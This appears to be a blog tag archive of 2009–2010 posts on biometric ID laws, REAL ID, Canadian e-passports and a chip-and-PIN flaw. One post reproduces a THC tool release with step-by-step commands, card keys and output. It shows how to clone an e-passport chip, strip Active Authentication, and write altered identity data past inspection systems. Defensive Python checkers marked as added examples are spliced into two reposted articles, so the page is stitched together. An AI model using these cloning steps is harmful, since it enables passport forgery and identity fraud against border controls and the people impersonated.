Posts Tagged ‘ RFID-enabled passports ’

Biometrics: New Hampshire considering banning biometrics in ID cards

Feb 19th, 2010 | By Innovya follow-up | Category: News

The New Hampshire legislature is considering a bill which would ban biometric data, including fingerprints, retinal scans, DNA, palm prints, facial feature patterns, handwritten signature characteristics, voice data, iris recognition, keystroke dynamics, and hand characteristics, from being used in state or privately issued ID cards, except for employee ID cards.

The move toward biometric IDs is accelerating, but New Hampshire wants to buck this trend. Acting out of concerns for residents’ privacy, the New Hampshire Legislature is considering a bill that would ban the use of biometrics data in identification cards. At least two trade groups oppose the legislation, saying biometrics technology has a number of security benefits.

The bill would prohibit biometrics data, including fingerprints, retinal scans, and DNA, from being used in state or privately issued ID cards, except for employee ID cards. In addition, it would ban the use of ID devices or systems that require the collection or retention of an individual’s biometric data.

SC Magazine’s Angela Moscaritolo writes that under the bill, biometric data would also include palm prints, facial feature patterns, handwritten signature characteristics, voice data, iris recognition, keystroke dynamics, and hand characteristics. “That’s the kind of information the government shouldn’t generally require to be gathered about an individual,” New Hampshire Representative Daniel Itse, who co-sponsored the bill, told SCMagazineUS.com on Wednesday.

The bill has drawn criticism from several organizations, including the Security Industry Association (SIA), a business trade group covering the electronic and physical security market. “SIA firmly believes that the broad restrictions proposed by [the bill]… reflects a significant misunderstanding of the security features and privacy safeguards of this widely-adopted technology,” the group said in a statement. SIA encouraged a New Hampshire House committee to reject the bill and conduct a study into the merits of biometrics technology.

Moscaritolo writes that this is the only pending bill of its kind in the nation, but in the past there have been similar legislative actions taken in opposition of biometrics technology, Don Erickson, director of government relations for SIA, told SCMagazineUS.com. “We are concerned about seeing a pattern of these bills start to pop up in states, which will result in a patchwork of different laws that organizations would have to comply with,” Erickson said.

A similar bill, introduced several years ago in Pennsylvania to limit the use of biometrics, was never acted on, Erickson said.

In contrast, numerous bills have passed at the state and federal levels to authorize and implement systems that use biometrics technology for personal identification, Walter Hamilton, chairman and president of the International Biometric Industry Association (IBIA), a nonprofit trade association representing developers, manufacturers, and integrators of biometrics, told Moscaritolo. “We think it’s inappropriate to single out a technology and say, ‘Thou shall not use,’” Hamilton said. “We think there are many examples of useful applications where it protects citizens.” The use of biometrics can thwart fraud and identity theft by ensuring a person is who they claim to be, he said.

Moscaritolo notes that the bill was introduced in January in the New Hampshire House Commerce and Consumer Affairs Committee. It was the subject of a public hearing Tuesday and is scheduled for discussion Thursday in an executive session of the committee.



Credit Card Frauds: Chip-and-PIN is broken

Feb 18th, 2010 | By Innovya follow-up | Category: News

If simple credit cards are cloneable, just imagine how “new ID cards” are supposed to be ‘unforgeable’ – yet it took an expert minutes to clone one and program it with false data.

By Cory Doctorow at 11:43 PM February 11, 2010

(Chip and PIN is broken via Schneier)

BBC: New flaws in chip and pin system revealed

Noted security researcher Ross Anderson and colleagues have published a paper showing how “Chip-and-PIN” (the European system for verifying credit- and debit-card transactions) has been thoroughly broken and cannot be considered secure any longer. I remember hearing rumbles that this attack was possible even as Chip-and-PIN was being rolled out across Europe, but that didn’t stop the banks from pushing ahead with it, spending a fortune in the process.

The flaw is that when you put a card into a terminal, a negotiation takes place about how the cardholder should be authenticated: using a PIN, using a signature or not at all. This particular subprotocol is not authenticated, so you can trick the card into thinking it’s doing a chip-and-signature transaction while the terminal thinks it’s chip-and-PIN. The upshot is that you can buy stuff using a stolen card and a PIN of 0000 (or anything you want). We did so, on camera, using various journalists’ cards. The transactions went through fine and the receipts say “Verified by PIN”.

It’s no surprise to us or bankers that this attack works offline (when the merchant cannot contact the bank) — in fact Steven blogged about it here last August.

But the real shocker is that it works online too: even when the bank authorisation system has all the transaction data sent back to it for verification. The reason why it works can be quite subtle and convoluted: bank authorisation systems are complex beasts, including cryptographic checks, account checks, database checks, and interfaces with fraud detection systems which might apply a points-scoring system to the output of all the above. In theory all the data you need to spot the wedge attack will be present, but in practice? And most of all, how can you spot it if you’re not even looking? The banks didn’t even realise they needed to check.
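An issuer-side consistency check for the mismatch described above, as an added example that is not from the original post or the researchers' paper: it compares what the terminal reports about cardholder verification (EMV CVM Results, tag 9F34) with what the card reports. The card's view is carried in issuer-proprietary data, so the `card_flags` field, its bit layout and the record format are assumptions, and the sample records are constructed.

```python
"""Added example: compare the terminal's and the card's view of PIN verification."""

# EMV Book 3: CVM codes (low 6 bits of CVM Results byte 1) that the card verifies.
OFFLINE_PIN_CVMS = {
    0x01: "plaintext PIN verified by ICC",
    0x03: "plaintext PIN verified by ICC + signature",
    0x04: "enciphered PIN verified by ICC",
    0x05: "enciphered PIN verified by ICC + signature",
}
CVM_SUCCESSFUL = 0x02  # CVM Results byte 3: 00 unknown, 01 failed, 02 successful

# HYPOTHETICAL bit layout for the card's own verification flags. Real cards
# report this inside Issuer Application Data (tag 9F10), whose format is
# scheme- and issuer-specific; substitute the decoder for your card profile.
CARD_PIN_PERFORMED = 0x04
CARD_PIN_FAILED = 0x02


def terminal_claims_offline_pin(cvm_results_hex):
    """True if the terminal says an offline PIN method ran and succeeded."""
    cvmr = bytes.fromhex(cvm_results_hex)
    if len(cvmr) != 3:
        raise ValueError("CVM Results (9F34) must be exactly 3 bytes")
    return (cvmr[0] & 0x3F) in OFFLINE_PIN_CVMS and cvmr[2] == CVM_SUCCESSFUL


def card_confirms_offline_pin(card_flags_hex):
    """True if the card says it performed PIN verification and it did not fail."""
    flags = bytes.fromhex(card_flags_hex)[0]
    return bool(flags & CARD_PIN_PERFORMED) and not flags & CARD_PIN_FAILED


def verdict(record):
    """Classify one authorisation record as CONSISTENT, MISMATCH or REVIEW."""
    try:
        terminal = terminal_claims_offline_pin(record["cvm_results"])
        card = card_confirms_offline_pin(record["card_flags"])
    except (KeyError, ValueError, IndexError):
        return "REVIEW"  # missing or malformed fields must never pass silently
    # The receipt would say "Verified by PIN" while the card never checked one.
    return "MISMATCH" if terminal and not card else "CONSISTENT"


def audit(records):
    """Map transaction id -> verdict for a batch of records."""
    return {r["id"]: verdict(r) for r in records}


# Constructed sample records (assumes the acquirer forwards 9F34 to the issuer).
SAMPLE_RECORDS = [
    {"id": "txn-001", "cvm_results": "410302", "card_flags": "04"},  # PIN on both sides
    {"id": "txn-002", "cvm_results": "410302", "card_flags": "00"},  # terminal: PIN, card: none
    {"id": "txn-003", "cvm_results": "1E0302", "card_flags": "00"},  # signature, no PIN claimed
    {"id": "txn-004", "cvm_results": "4103", "card_flags": "04"},    # truncated 9F34
]

if __name__ == "__main__":
    for txn_id, result in audit(SAMPLE_RECORDS).items():
        print(txn_id, result)
```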



Big Brother: National Biometrics in Israel

Dec 30th, 2009 | By Innovya follow-up | Category: News

The Knesset has passed Israel’s Biometric Database Law, expected to provide the statutory basis for introduction of ‘smart’ identification documents for all Israelis.

Interior Ministry officials will be authorized to collect the Biometric data – fingerprints and facial contours – of all residents for the purpose of issuing identity cards, passports or other official documents.

As with similar identity regimes in Australia and elsewhere (eg the latest generation of Australian passports), those documents will feature a microprocessor (ie a chip similar to those used in some credit cards and perimeter access cards) that will contain data based on the individual’s fingerprints (two fingers) and facial geometry, eg a unique hash generated from an image of the person’s face rather than the image itself. Biometric and other information on the databases will be matched with registration information on national databases. That would permit an official to determine, for example, that the photo on an identity document corresponds to the bearer’s face but that the individual is using another name and therefore is engaging in an identity offence.

As yet I haven’t sighted the legislation. From media reports it appears that the government has mollified some critics through a statutory commitment to establish two discrete databases: one including the card-bearer’s name and the other featuring data from the individual’s fingerprints and the face. The databases will be established and maintained in two separate ministries and “will be linked by a code”. There seem to be no official statements about sharing data with the private sector.

The ‘splitting’ of initial plans for a central database was an addition to the draft legislation in November, promoted as a safety measure -

so that anyone managing to penetrate one data bank would have only part of the information and it would be meaningless without the information from the other data bank.

The Chair of the Knesset Science & Technology Committee claimed -

The protection provided for this data bank is among the best in the world. It is protected at a level of 11 on a scale of one to 10

… which sounds impressive but is arguably meaningless. (What’s an ‘11’ when the scale ends at ‘10’? The Bill’s sponsor subsequently explained that “if the databases of the Mossad, the Shin Bet and the Prime Minister’s Office are currently protected at a level of 10, then this one will be protected at a level of 11”.)

Debate about development of the new regime featured the usual claims. A government spokesperson claimed that “there are 350,000 people living in Israel with fraudulent documents including tens of thousands with forged passports” and that forgery of the ‘smart’ documents will be impossible.

One former police executive offered an exceptionalist argument, commenting that -

in a normal state that does not face the enemies we face, there is no need for such a system. But here we are in an intolerable situation, facing internal and external enemies. The ease with which current Israeli documents can be forged is an enormous problem.

[Identity documents] are so easily faked. For us, this is an existential issue. There are thousands of people walking around with fake IDs or with no IDs whatsoever. Some are criminals, and others are hostile elements. You would not believe how many suspects we have found who changed their identities to hide previous convictions. Many identities have also been stolen.

He noted that the danger of official misuse of information is present with existing databases.

Critics expressed concern that information will be leaked or misused, eg “Criminals could steal fingerprint information and use it to incriminate innocent people”. Likud Minister Michael Eitan indicated that -

Not only will the system threaten the privacy of all Israelis, but even worse, it will create an atmosphere in which everyone will feel their privacy is being invaded….

Eitan was not however planning to vote against the law. (???!!!)

Implementation of the law involves a two year trial period, during which participation in the biometric database/s will be voluntary. Three months prior to the end of trial, the government will formally re-assess the regime’s effectiveness, with the Prime Minister and Interior minister reporting to a special ministerial committee and to a Knesset committee. If the trial is deemed successful, Interior Ministry officials will be mandated to collect the biometric information without consent. The legislation allows some wriggle room: the Interior Minister will be empowered to extend the trial by an additional two years after provision of the reports, with a requirement that a ‘final decision’ must be made within four years after initiation of the databases.

Posted by Bruce Arnold at 2:03 PM


Letter: By December 31, 2009 – Citizens will not be able to use their driver’s licenses as identification to board commercial aircraft

Dec 14th, 2009 | By Innovya follow-up | Category: Evidence

Letter


November 18, 2009

The Honorable Nancy Pelosi
Speaker
U.S. House of Representatives
Washington, DC  20515

The Honorable Harry Reid
Majority Leader
United States Senate
Washington, DC  20510

The Honorable John Boehner
Minority Leader
U.S. House of Representatives
Washington, DC  20515

The Honorable Mitch McConnell
Minority Leader
United States Senate
Washington, DC  20510

Dear Speaker Pelosi, Senator Reid, Senator McConnell, and Representative Boehner:

By December 31, 2009, states must be materially compliant with the REAL ID Act of 2005 (REAL ID) or their citizens will not be able to use their driver’s licenses as identification to board commercial aircraft.  Based on a survey of our states, we believe that as many as 36 states will not meet the requirements of REAL ID by the end of the year.  To avoid this disruption to our citizens, especially during the holiday travel period, Congress must pass S. 1261, the “Providing for Additional Security in States’ Identification Act” (PASS ID), this year.

Since REAL ID was enacted, states have maintained that its timelines and requirements are unrealistic and constitute a huge unfunded mandate with costs far outpacing federal funding.  For these reasons, and as a result of privacy concerns, 13 states have enacted legislation prohibiting full compliance with the requirements of REAL ID, and several others have passed anti-REAL ID resolutions or have similar legislation pending. Without state participation, REAL ID falls far short of its promises, and the uncertainty of its future leaves us less secure.

PASS ID offers better, more secure and less costly standards for driver’s licenses than REAL ID.  It would alter REAL ID to allow state innovation in meeting security requirements and reduce costs by eliminating unnecessary requirements that do not increase the security and integrity of driver’s licenses and identification cards.  It also addresses privacy concerns by protecting individuals’ personal information and takes the first step toward covering the cost of compliance by authorizing funds for all states to implement the law.

The Senate Homeland Security and Governmental Affairs Committee unanimously approved S. 1261 in July.  The bill enjoys bipartisan support and the endorsement of the Secretary of the U.S. Department of Homeland Security as a practical solution that builds on the strengths of REAL ID, fixes its weaknesses and represents the best way to fulfill an important recommendation of the 9/11 Commission.

Our citizens should not be punished for the failures of REAL ID.  We therefore ask that you work with us to pass S. 1261 before the end of the year.

Sincerely,

Governor James H. Douglas

Governor Joe Manchin III



Real ID Follies Continue with PASS ID Waiting in the Wings

Dec 14th, 2009 | By Innovya follow-up | Category: News

Submitted by MacRonin on December 13, 2009 – 7:00pm

Real ID Follies Continue with PASS ID Waiting in the Wings: Via EFF.org Updates.

Since 2007, the U.S. State Department has been issuing high-tech “e-passports,” which contain computer chips carrying biometric data to prevent forgery. Unfortunately, according to a March report from the Government Accountability Office (GAO), getting one of these supersecure passports under false pretenses isn’t particularly difficult for anyone with even basic forgery skills.

As 2009 draws to a close, we’re inching ever deeper into the corner that Congress painted us into by passing Real ID under the table in 2005. (Recall that Real ID is the failed, Bush-era attempt to turn state drivers licenses into national ID cards by forcing states to collect and store licensee data in databases, and refusing to accept non-compliant IDs for federal purposes, like boarding a plane or entering a federal building.)

The official deadline for states to comply with the Department of Homeland Security’s (DHS) final Real ID rule is December 31, 2009, and an estimated 36 states will not be in compliance by then, leading to some ambiguity for many citizens. For example, will residents of Montana be able to board planes in January 2010 with only a driver’s license (a state-supplied, technically non-compliant document) and without a passport (an identity document issued by the federal government)?

Past history strongly suggests that DHS will issue last-minute waivers to states that have not amped up their drivers licenses to adhere to Real ID. Early in 2008, states that actively opposed Real ID received waivers from DHS, nominally marking the states as “compliant” despite strongly-stated opposition to ever implementing Real ID.

But waiting in the wings is PASS ID, a bill that attempts to grease the wheels by offering money to the states to implement ID changes. Despite having the appearances of reform, PASS ID essentially echoes Real ID in threatening citizens’ personal privacy without actually justifying its impact on improving security. For this reason, PASS ID is not popular — privacy advocates refuse to support the bill because it still creates a national ID system. It still mandates the scanning and storage of applicants’ critical identity documents (birth certificates, visas, etc.), which will be stored in databases that will become leaky honeypots of sensitive personal data — prime targets for malicious identity thieves or otherwise accessible by individuals authorized to obtain documents from the database. And on the other side, short-sighted surveillance hawks are unhappy with the bill because they support the privacy violations architected into the provisions of the original Real ID Act.

As such, advocates of PASS ID are publicly wringing their hands over the deadline in order to encourage Congress to approve the PASS ID Act before the end of the year. But the fracas over health reform is suffocating any chance for meaningful debate about the merits of PASS ID before the Dec. 31st deadline.

A pragmatic analysis should show that Real ID is dead. To date, 24 states have enacted resolutions or binding legislation prohibiting participation in Real ID, and the varied, desperate efforts to reanimate it are misguided. Whether the states or the federal government signs the invoice, the cost ultimately falls to taxpayers, who should be troubled that neither Real ID nor PASS ID is likely to fulfill the stated goal of stopping terrorists from obtaining identity documents. (Just this week, noted security expert Bruce Schneier linked to a report about government investigators successfully using fake identity documents to obtain high-tech “e-passports,” which were then used to buy plane tickets, and board flights — the point being that a fancy, “secure” identity document doesn’t stop individuals from exploiting a weak bureaucracy.)

On the other hand, the resulting databases filled with scanned identity documents will create tantalizing targets for identity thieves and headaches for people whose digital documents are pilfered; and a national ID system will invite mission creep from the government as well as private entities like credit reporting agencies and advertisers. It’s high time for reason to replace the reflexive defense of a failed scheme. Congress should repeal Real ID for real and seek more inspired, protective solutions to identity document security.



Black Day for Democracy: Knesset Approves ‘Biometric Law’

Dec 9th, 2009 | By Innovya follow-up | Category: News

ISRAEL at Risk of Not Being a Democracy Anymore: Knesset Approves INVASIVE ‘Biometric Law’

Anyone who follows the news has no doubt come across the claim that “Israel is the only democracy in the Middle East.” Usually, this claim is followed by its logical inference: “As an island of freedom located in a region controlled by military dictators, feudal kings and religious leaders” – not any more. Israeli democracy is now controlled by superficial politicians…

Black Day for Democracy


By Gil Ronen and Nissan Ratzlav-Katz

(IsraelNN.com) The Knesset plenum approved Monday evening the ‘Biometric Law’ in the final readings. Forty Knesset members voted in favor of the law, 11 against and three abstained. The purpose of the law is the creation of a biometric database that would hold the fingerprints and facial photos of all of the country’s citizens. The data would be stored in the Interior Ministry computers.

MK Nitzan Horowitz (Meretz), who led the opposition to the law, said after its approval that the vote was “a serious mistake which causes grave harm to freedom of the individual in Israel.”

“I hope that we do not pay too heavy a price for it,” Horowitz said. “In any case, it has been proven that an unrelenting public struggle by idealists can have influence and make a difference. The proof is that the law in its final wording is completely different from the original version.”

During the Knesset debate about the law, MK Horowitz stood at the podium and held up printouts of information from the Ministry of Interior’s database which contained information about Knesset members and which reached the Internet. He said that he would not show the contents so as not to invade the MKs’ privacy. “The leaked data which reached my hands prove how easy it is to break into government databases,” he said. “I hope that this will not be the fate of the biometric database.”

MK Dov Henin (Hadash) said that despite the government’s statements that it would not force Israeli citizens to join the database, “in fact, whoever does not do so would be punished – he will not be able to leave the country’s borders, since he would not receive a passport at the level required in developed countries.” The database is not truly a voluntary one, he said.

Faked fingerprints
On the same day that the Knesset approved the law, there was news from Tokyo that appeared to show that this system, too, was not foolproof. Police in the Japanese capital said that they arrested a 27-year-old Chinese woman suspected of illegally entering the country after surgically altering her fingerprints to deceive a biometric recognition system operated by immigration officials.



E-passports get F for privacy

Dec 1st, 2009 | By Innovya follow-up | Category: News

Commissioner warns passport office not to include biometric info on radio chips

By ALTHIA RAJ, NATIONAL BUREAU

The federal privacy watchdog has rejected Passport Canada’s plan to embed fingerprints and iris scans in electronic passports.

In a review of the project, the Office of the Privacy Commissioner told the passport office not to include new biometric information on a radio-frequency chip encoded in e-passports.

“The more information you collect, the more information you put at risk,” said assistant privacy commissioner Chantal Bernier.

She said Passport Canada “backed away” from putting more data on the chip than they currently collect.

DIGITIZED PICTURE

E-passports will feature a digitized picture of the passport holder as well as their name, date of birth, location of birth and passport number, said Passport Canada spokesman Jean-Sebastien Roy.

A national rollout of the e-passport is expected to begin in 2011.

“(They provide) greater protection against fraudulent misuse and tampering, and reduce the risk of identity fraud,” Roy said.

The privacy commissioner’s review raised concerns about whether the chip is “adequately protected against unauthorized interception,” such as skimming and eavesdropping. The watchdog noted an e-passport hacking case in the United Kingdom.

“If the data can be readily copied and replicated, electronic passports may do more to facilitate identity theft than to prevent it,” said Jason Gratl of the B.C. Civil Liberties Association.

The passport office said its chip can only be read 10 cm away.

‘HIGH RISKS’

David Harris, former chief of strategic planning for the Canadian Security Intelligence Service (CSIS), said there are “high risks” associated with electronic databases, but comprehensive information such as biometrics in passports are needed to guard against terrorist threats.

“We’ve got to be all the more careful in doing what might prove to be unavoidable,” he said.

Canadian e-passports were developed after the International Civil Aviation Organization adopted new requirements for an embedded chip in 2005.

Privacy advocates say the chip raises additional concerns, such as the potential to build databases that track travellers across national boundaries.

“It substantially increases the powers of the state to survey individuals,” said University of Toronto professor Andrew Clement. Databases are often created with one goal and then used for other purposes, he said.

Richard Rosenberg of the Freedom of Information and Privacy Association said he is concerned Canadians won’t be able to check the accuracy of the information on the chip and risk being unfairly blacklisted like many travellers on the no-fly list.

The passport office said it has no plans to collect or use the information in other ways and promised to investigate options to allow individuals to access the data on their chip.

ALTHIA.RAJ@SUNMEDIA.CA



How to create a backup of your own passport chip(s)

Nov 12th, 2009 | By Innovya follow-up | Category: Evidence


THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make us more secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning :) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.


(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country :-D

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

vonJeek's passport

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerely,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org
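
A defender-side check for the EF.COM manipulation described above (DG15, tag 0x6F, removed from EF.COM), as an added example that is not part of the original post or of the THC or RFIDIOt tools: an inspection system treats the signed hash list in EF.SOD, not the unsigned EF.COM, as the index of data groups. The function names and sample files are constructed for illustration, and the EF.SOD signature is assumed to have been verified against a trusted CSCA certificate beforehand.

```python
import hashlib

# ICAO Doc 9303 LDS: tag byte in the EF.COM tag list -> data group number (DG1..DG16).
TAG_TO_DG = dict(zip(bytes.fromhex("6175637665666768696A6B6C6D6E6F70"), range(1, 17)))
SHA256_OID = bytes.fromhex("608648016503040201")
HASH_BY_OID = {bytes.fromhex("2b0e03021a"): "sha1", SHA256_OID: "sha256"}

def read_tlv(buf, i):
    """Read one BER/DER TLV at offset i; return (tag_bytes, value, next_offset)."""
    try:
        start = i
        if buf[i] & 0x1F == 0x1F:        # multi-byte tag such as 5F01
            i += 1
            while buf[i] & 0x80:
                i += 1
        i += 1
        tag = bytes(buf[start:i])
        length = buf[i]
        i += 1
        if length & 0x80:                 # long-form length
            n = length & 0x7F
            length = int.from_bytes(buf[i:i + n], "big")
            i += n
    except IndexError:
        raise ValueError("truncated TLV header") from None
    if i + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[i:i + length], i + length

def children(value):
    """Split the contents of a constructed TLV into (tag, value) pairs."""
    out, i = [], 0
    while i < len(value):
        tag, val, i = read_tlv(value, i)
        out.append((tag, val))
    return out

def dgs_in_ef_com(ef_com):
    """Data group numbers advertised by the unsigned EF.COM index file."""
    tag, body, _ = read_tlv(ef_com, 0)
    fields = dict(children(body))
    if tag != b"\x60" or b"\x5c" not in fields:
        raise ValueError("not an EF.COM file")
    return {TAG_TO_DG[t] for t in fields[b"\x5c"] if t in TAG_TO_DG}

def hashes_in_lds_security_object(lds_so):
    """Return (hash_name, {dg_number: digest}) from a DER LDSSecurityObject."""
    _, body, _ = read_tlv(lds_so, 0)
    (_, _version), (_, alg), (_, dg_hashes) = children(body)[:3]
    oid = children(alg)[0][1]
    if oid not in HASH_BY_OID:
        raise ValueError("unsupported hash algorithm OID")
    signed = {}
    for _, entry in children(dg_hashes):
        (_, number), (_, digest) = children(entry)
        signed[int.from_bytes(number, "big")] = digest
    return HASH_BY_OID[oid], signed

def check_chip_files(ef_com, lds_so, data_groups):
    """List inconsistencies between EF.COM, the signed hashes and the files read.

    ASSUMPTION: lds_so comes from an EF.SOD whose CMS signature was already
    verified against a trusted CSCA certificate (that step is not shown).
    """
    listed = dgs_in_ef_com(ef_com)
    algo, signed = hashes_in_lds_security_object(lds_so)
    findings = []
    for dg in sorted(set(signed) - listed):   # e.g. DG15 stripped from EF.COM
        findings.append(f"DG{dg} is hashed in EF.SOD but missing from EF.COM")
    for dg in sorted(listed - set(signed)):
        findings.append(f"DG{dg} is listed in EF.COM but has no EF.SOD hash")
    for dg, data in sorted(data_groups.items()):
        if dg in signed and hashlib.new(algo, data).digest() != signed[dg]:
            findings.append(f"DG{dg} content does not match its EF.SOD hash")
    return findings

# --- Constructed sample files below (not real passport data) ---
def tlv(tag, value):
    """Minimal DER encoder used only to build the sample files."""
    n = len(value)
    size = (n.bit_length() + 7) // 8
    length = bytes([n]) if n < 0x80 else bytes([0x80 | size]) + n.to_bytes(size, "big")
    return tag + length + value

def sample_files(listed_in_com):
    """Build (ef_com, lds_so, data_groups); EF.COM lists only listed_in_com."""
    dgs = {1: b"constructed MRZ", 2: b"constructed face image", 15: b"constructed AA key"}
    entries = b"".join(
        tlv(b"\x30", tlv(b"\x02", bytes([n])) + tlv(b"\x04", hashlib.sha256(d).digest()))
        for n, d in sorted(dgs.items()))
    alg = tlv(b"\x30", tlv(b"\x06", SHA256_OID) + tlv(b"\x05", b""))
    lds_so = tlv(b"\x30", tlv(b"\x02", b"\x00") + alg + tlv(b"\x30", entries))
    tags = bytes(t for t, n in TAG_TO_DG.items() if n in listed_in_com)
    ef_com = tlv(b"\x60", tlv(b"\x5f\x01", b"0107") + tlv(b"\x5f\x36", b"040000")
                 + tlv(b"\x5c", tags))
    return ef_com, lds_so, dgs

if __name__ == "__main__":
    com, so, files = sample_files({1, 2})     # DG15 dropped from EF.COM only
    for finding in check_chip_files(com, so, {1: files[1], 2: files[2]}):
        print(finding)
```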


Civil Society Declaration Amounts to Abandonment of Human Progress

Oct 28th, 2009 | By Innovya follow-up | Category: Opinions

Posted By Mark Roberti, 10.28.2009

RFID JOURNAL BLOG

An international civil society coalition has published a declaration, Global Privacy Standards for a Global World, that—among other things—calls for “a moratorium on the development or implementation of new systems of mass surveillance, including facial recognition, whole body imaging, biometric identifiers and embedded RFID tags, subject to a full and transparent evaluation by independent authorities and democratic debate.”
The declaration is signed by 68 organizations from around the world. While I agree with the coalition’s goal to assure individuals’ privacy, I’m amazed that the group has such a shallow understanding of the nature of technology and its role in furthering the welfare of the human race. Perhaps it pines for the days when people lived in caves, and no one worried about privacy.

The problem is that these organizations have a bias that some technologies are good and some are bad. They believe the ones they declare to be good should be funded by the government and promoted, while the ones they think are bad should be halted until they can be studied and sufficient safeguards can be put in place.

Technologies are neither good nor evil, however. They are tools that can be used for good or evil. It might seem to make sense to call for a moratorium on technology, but who chooses which technologies we should hold off using until they are studied? Should we have a moratorium on any technology that removes carbon dioxide from the atmosphere, for example? My guess is that the organizations that signed the civil society declaration would say no, because anything that reduces carbon dioxide would reduce global warming and would, thus, be a “good” technology.

Renowned physicist Freeman Dyson, however, argues that more carbon dioxide and warmer climates are actually healthy for plants, because they grow better in such conditions, and that could lead to greater food production and less hunger in the world. He also points out that forcing a massive reduction in carbon emissions would slow global economic growth and hurt the world’s poor.

Even if you disagree with Dyson, the reality is that we don’t know what the result of carbon-reducing technologies would be, any more than we know precisely what the impact of global warming will be. So perhaps we should put a moratorium on efforts to reduce carbon dioxide in the atmosphere until we can conclusively prove that it would be good for the planet. Ridiculous? Of course it is—but no more ridiculous than banning any other technology until we understand its every ramification.

